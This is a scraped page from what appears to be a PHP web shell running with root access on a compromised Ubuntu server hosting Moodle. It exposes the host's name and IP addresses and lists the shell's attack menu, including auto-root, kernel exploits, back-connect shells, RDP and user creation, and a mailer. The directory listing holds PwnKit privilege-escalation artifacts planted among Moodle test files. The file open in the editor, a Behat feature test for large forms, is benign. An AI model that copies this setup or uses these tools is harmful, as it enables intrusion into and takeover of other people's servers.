Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
action_menu.feature
1.11
KB
-rwxrwxrwx
action_modal.feature
2.19
KB
-rwxrwxrwx
alpha_chooser.feature
21.29
KB
-rwxrwxrwx
app_behat_runtime.js
24.63
KB
-rwxrwxrwx
behat_action_menu.php
8.02
KB
-rwxrwxrwx
behat_app.php
21.51
KB
-rwxrwxrwx
behat_data_generators.php
9.71
KB
-rwxrwxrwx
behat_deprecated.php
6.48
KB
-rwxrwxrwx
behat_filters.php
2.95
KB
-rwxrwxrwx
behat_forms.php
29.89
KB
-rwxrwxrwx
behat_general.php
89.95
KB
-rwxrwxrwx
behat_hooks.php
33.02
KB
-rwxrwxrwx
behat_navigation.php
45.76
KB
-rwxrwxrwx
behat_permissions.php
12.47
KB
-rwxrwxrwx
behat_transformations.php
5.56
KB
-rwxrwxrwx
datetime_any.feature
4.09
KB
-rwxrwxrwx
largeforms.feature
4.45
KB
-rwxrwxrwx
locking.feature
8.26
KB
-rwxrwxrwx
min_max_version.feature
1
KB
-rwxrwxrwx
permissionmanager.feature
2.61
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readonlyform.feature
1.63
KB
-rwxrwxrwx
securelayout.feature
1.68
KB
-rwxrwxrwx
timezone.feature
431
B
-rwxrwxrwx
userfeedback.feature
2.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : largeforms.feature
@core Feature: Forms with a large number of fields In order to use certain forms on large Moodle installations As an admin I need forms to work with more fields than the PHP max_input_vars setting Background: # Get to the fixture page. Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activities" exist: | activity | name | intro | course | idnumber | | label | L1 | <a href="../lib/tests/fixtures/max_input_vars.php">FixtureLink</a> | C1 | label1 | When I am on the "C1" "Course" page logged in as "admin" And I follow "FixtureLink" # Note: These tests do not actually use JavaScript but they don't work with # the headless 'browser'. @javascript Scenario: Small form with checkboxes (not using workaround) When I follow "Advanced checkboxes / Small" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk checkbox success: true" @javascript Scenario: Medium length form with checkboxes (needs workaround) When I follow "Advanced checkboxes / Below limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk checkbox success: true" @javascript Scenario: Exact PHP limit length form with checkboxes (uses workaround but doesn't need it) When I follow "Advanced checkboxes / Exact PHP limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk checkbox success: true" @javascript Scenario: Longer than the limit with checkboxes (needs workaround) When I follow "Advanced checkboxes / Above limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk checkbox success: true" @javascript Scenario: Small form with array fields (not using workaround) When I follow "Select options / Small" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk array success: true" @javascript Scenario: Below limit form with array fields (uses workaround but doesn't need it) When I follow "Select options / Below limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk array success: true" @javascript Scenario: Exact PHP limit length form with array fields (uses workaround but doesn't need it) When I follow "Select options / Exact PHP limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk array success: true" @javascript Scenario: Longer than the limit with array fields (needs workaround) When I follow "Select options / Above limit" And I press "Submit here!" Then I should see "_qf__core_max_input_vars_form=1" And I should see "mform_isexpanded_id_general=1" And I should see "arraytest=[13,42]" And I should see "array2test=[13,42]" And I should see "submitbutton=Submit here!" And I should see "Bulk array success: true"
Close